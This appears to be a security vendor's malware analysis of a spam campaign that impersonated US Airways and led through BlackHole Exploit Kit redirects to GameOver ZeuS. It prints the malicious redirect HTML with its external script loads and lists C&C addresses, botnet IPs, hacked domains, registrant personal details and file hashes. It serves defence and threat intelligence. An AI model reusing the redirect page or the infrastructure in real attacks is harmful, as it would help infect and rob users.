Spam
On 20 March, we detected a spam campaign targeting passengers of US Airways. Almost the entire week cybercriminals were sending users the following email allegedly from US Airways:
There is a brief description of the check-in procedure and a confirmation code is provided for online reservation.
The criminals are obviously banking on any recipients flying on the flight mentioned in the email clicking on the link “Online reservation details”.
Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.
After clicking the link a series of redirects eventually leads to a domain hosting BlackHole Exploit Kit.
BlackHole Exploit Kit: redirections and infection
A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following html code:
<html>
<h1 id="wait-please">WAIT PLEASE</h1>
<h3 id="loading">Loading…</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>
As a result, javascripts are loaded into the user’s browser from different domains. The javascripts contain a single command such as: document.location=’http://indigocellular.com/’. This command redirects the user to a page containing another, obfuscated, javascript.
This javascript’s job is to insert links into the html code of the page that then lead to the object with the exploit. So far, we’ve detected three types of objects: a JAR file, SWF file and a PDF document. Each object exploits a vulnerability in the respective application – Java, Flash Player or Adobe Reader — to execute malicious code in the targeted system. If a vulnerable version of even one of those applications is being used, the attack ends in infection – the malicious executable is loaded and run in the user’s system.
Malicious JAR, SWF and PDF documents are loaded from different domains — e.g. indigocellular.com, browncellular.com, bronzecellular.com (domains info) — under the names Qai.jar, field.swf, dea86.pdf, 11591.pdf.
We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof
After successfully exploiting vulnerabilities, an executable file is downloaded from the same domains where the exploits are located. It can be downloaded under different names — about.exe, contacts.exe and others — and is essentially a downloader. When the downloader runs, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, and downloads and runs another malicious program – ZeuS/ZBot or, to be more precise, a modification of one of the development branches of that Trojan known as ‘GameOver’ – on the user’s system.
ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com
Polymorphism
At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and ZeuS — was frequently replaced with a new one. The domains remained “alive” for nearly 12 hours, while the ZeuS samples were replaced more often.
During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.
To recap, a modification includes all the samples that are detected with the same verdict, hence number of detected programs is usually bigger than the number of verdicts.
Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams
Total number of programs detected with these verdicts: 250.
ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Total number of samples detected with these verdicts: 127.
As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.
Botnet identificators
It wasn’t just the ZeuS wrapper that was being changed (packer, anti-emulation), the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and some IP addresses which the malicious program tries to connect to following infection. Those data were modified over time as well. According to the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.
Having analyzed 48 versions of the different modifications of ZeuS that were used by cybercriminals in this attack, I discovered 19 unique botnet identificators:
chinz22 | chinz24 | blk25 | mmz22 | mmz24 | mmz25 |
molotz25 | NR22 | NR23 | NR24 | NR25 | ppcz22 |
ppcz23 | ppcz24 | rnato25 | rubz22 | rubz23 | rubz24 |
zuu | |||||
In contrast to the conventional ZeuS program which usually contains a single URL to download a configuration file, each sample of GameOver has 20 hardcoded IP addresses with ports. Having infected the victim’s computer, GameOver tries to establish a connection to those addresses in order to inform a botnet about itself, retrieve information (e.g. web injects), send data stolen from the victim.
Of the 960 IP addresses contained in the 48 analyzed samples, just 157 of them are unique:
109.86.20.192:25071 | 111.252.183.142:22376 | 114.149.70.68:11807 | 114.41.42.83:23061 | 114.47.174.132:25602 |
116.68.106.249:17051 | 116.74.63.215:28397 | 117.197.130.195:17253 | 117.200.28.128:26895 | 121.96.154.99:18978 |
122.120.6.124:22322 | 122.26.48.225:25178 | 123.231.81.178:20129 | 124.13.56.101:15582 | 125.25.55.156:20834 |
140.130.36.32:13590 | 143.90.182.68:15121 | 151.40.222.25:19197 | 161.24.7.83:28740 | 165.228.237.204:17223 |
173.11.33.57:28198 | 175.141.221.126:24400 | 177.17.3.94:14470 | 177.41.72.204:19922 | 177.42.233.93:13577 |
177.42.26.217:14084 | 178.121.5.147:22245 | 178.156.170.215:14697 | 180.234.242.6:12692 | 186.122.42.176:21468 |
186.146.109.235:28038 | 186.169.207.31:25267 | 186.206.85.241:29592 | 186.212.252.139:26376 | 186.61.97.233:18271 |
187.21.121.179:29597 | 187.52.165.241:25003 | 187.59.156.215:23810 | 187.78.48.90:28054 | 188.24.177.174:20670 |
188.24.183.30:20670 | 188.24.42.247:29919 | 188.24.91.76:18603 | 188.24.94.127:18603 | 188.25.32.93:18509 |
188.26.246.185:21181 | 188.27.192.140:10991 | 188.27.77.6:14351 | 189.103.58.227:15863 | 189.106.203.3:22619 |
189.113.210.69:16075 | 189.58.63.42:23810 | 190.11.42.132:16838 | 190.183.196.38:27445 | 190.200.120.150:17663 |
190.201.27.240:12618 | 190.231.254.101:11271 | 190.26.120.90:22952 | 2.40.249.44:23266 | 200.109.42.212:25890 |
200.126.164.122:25565 | 200.84.130.185:29346 | 201.145.184.97:25585 | 201.173.212.122:25493 | 201.21.14.224:19004 |
201.58.108.117:19986 | 201.58.79.254:19986 | 202.149.67.164:26124 | 206.219.64.130:21401 | 208.180.223.27:12046 |
213.163.112.183:22254 | 213.164.225.186:25619 | 216.187.184.34:28333 | 218.170.36.242:13286 | 218.170.42.95:13286 |
221.133.18.131:12492 | 222.124.55.128:29563 | 24.154.22.50:13524 | 27.119.46.174:22985 | 27.4.113.69:27664 |
41.102.165.37:29870 | 41.252.115.102:25734 | 46.197.66.43:29879 | 49.128.175.94:24566 | 50.129.124.49:28454 |
60.246.131.173:23424 | 61.78.79.8:16362 | 66.193.204.141:26171 | 68.127.16.166:22762 | 68.150.204.237:16150 |
71.11.205.72:23114 | 72.185.157.254:29727 | 72.199.188.132:25142 | 72.64.43.86:21316 | 75.108.18.26:21332 |
75.127.204.90:10945 | 75.35.88.121:26277 | 76.185.32.7:18942 | 77.254.230.170:15741 | 78.166.182.155:12114 |
78.61.173.28:22352 | 78.62.246.91:16094 | 78.87.143.67:21277 | 79.112.219.78:13525 | 79.112.231.138:13644 |
79.113.104.28:29098 | 79.113.104.97:29098 | 79.115.143.244:16824 | 79.115.226.238:14247 | 79.116.121.163:14751 |
79.116.28.147:27683 | 79.117.177.174:12523 | 79.118.247.63:14481 | 79.38.117.69:18242 | 79.39.241.147:29216 |
79.47.239.67:28246 | 81.0.94.178:27735 | 81.214.253.235:13820 | 81.64.159.213:22322 | 81.65.125.102:24715 |
82.131.113.220:15271 | 82.131.141.80:27735 | 82.211.174.146:25219 | 82.88.65.111:17345 | 83.228.43.66:11167 |
83.4.30.245:21628 | 84.232.253.30:19202 | 84.32.66.38:25067 | 85.110.206.175:22346 | 85.250.176.250:15494 |
86.121.16.63:27337 | 86.124.108.93:20225 | 87.126.224.174:11314 | 87.207.108.163:14491 | 87.24.128.66:14935 |
88.235.4.104:22459 | 88.250.42.18:14086 | 89.120.100.121:19228 | 89.136.130.155:22321 | 89.137.18.224:21326 |
91.127.173.36:10734 | 91.179.41.185:15941 | 91.179.41.185:24693 | 92.241.134.103:26870 | 94.122.71.97:11842 |
94.203.147.11:20599 | 94.39.240.218:14338 | 94.53.198.35:24596 | 94.66.81.228:15663 | 95.104.111.141:11838 |
95.226.45.198:18846 | 95.56.143.17:23352 | 95.9.163.52:24483 | 97.78.7.0:10159 | 99.169.224.231:22266 |
99.190.137.80:12109 | 99.7.203.52:18700 |
Attack geography
I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they’ve used a flight-related trick, it’s the first time this particular kind of spam has been detected. If the recipients belong to a target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.
Obviously, for the period under review other spam emails were being sent including links that led to the same sites, the same exploits and the same malicious executable files mentioned above. I took a look at where the threats that were related in some way or another to this attack were detected by our users. Below you can see a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:
Russia | 32.8% |
USA | 10.3% |
Italy | 9.2% |
Germany | 8.6% |
India | 6.9% |
France | 3.8% |
Ukraine | 3.6% |
Poland | 3.2% |
Brazil | 3.1% |
Malaysia | 3% |
Spain | 2.9% |
China | 2.7% |
P.S. Here’s some information about the domains being used in the spam campaign described above
(it’s not the first time these registration details have been used to register other domains that participate in propagating malicious software via spam):
indigocellular.com | 209.59.218.102 |
Registrant: | Nicholas Guzzardi, clarelam@primasia.com |
5536 Gold Rush Dr.NW | |
87120 Albuquerque | |
United States | |
Tel: +1.5053505497 | |
browncellular.com | 174.140.168.207 |
Registrant: | Renee Fabian, clarelam@primasia.com |
2840 Center Port Circle | |
Pompano Beach, FL 33064 | |
US | |
bronzecellular.com | 96.9.151.220 |
Registrant: | Renee Fabian, clarelam@primasia.com |
2840 Center Port Circle | |
Pompano Beach, FL 33064 | |
US |
Below you can find an excerpt of MD5-hashes of files
Exploit.Java.CVE-2011-3544.mz | Exploit.JS.Pdfka.fof | Exploit.SWF.Agent.gd |
892693dbc749510fe530269d707fdb34 | 2D13BCEF58B8E29C52AF1D29F2E81544 | 0c341dab17d221b19d707254097bd9c0 |
fb77c4c32297c460a786cb138768647e |
Downloader | ZeuS |
0f7dc4fac417f2e5145d210ee5bc2129 | 02fbfc95c2f99490f9382ec704c1f1e5 |
102e6b401079b1be09bb47da9ee84bfe | 081943d546a7364bfd7f3ae1360aa657 |
11b66c03801353c25c4bab7abd5f8588 | 1b83702cd12e4f8d48771ca1cbcaf034 |
0b95280b2ad4dff0daaf65d801df7535 | 2775cf95d5450bdb54cf537f35e8e504 |
0c720f41ecbcacf563630e0ac8739136 | 42de75c29dc058f14dab5fe94130a907 |
0c952e99a5014a2fd30c1c613ffb9671 | 432788a5e34a9be4989b3088eeec41ca |
5e097d18a41035e73003d9e47adc232f | 0299f2de435f6406ef8c5e51826d3e42 |
0b1165cfa99ae9383439e0c1a7e070fb | 0f7664e04d4d62c4b4ad09b085109008 |
11a97068338efd774f744a9c4cd9afe7 | 46737ca337d178894532d570ad729089 |
4e44ca94f7682b7a8734025a05545a42 | 77e772b8d17d0ccd52be1fcbbdd71ee4 |
c94e90f9adc52e72c403ff79ea8b6cbc | f6853b73db8a1e6105a0b2734974205e |
73515909a2d6353714a5226577554688 | ee80937bee1231f4223d98c4d4a56480 |
A gift from ZeuS for passengers of US Airways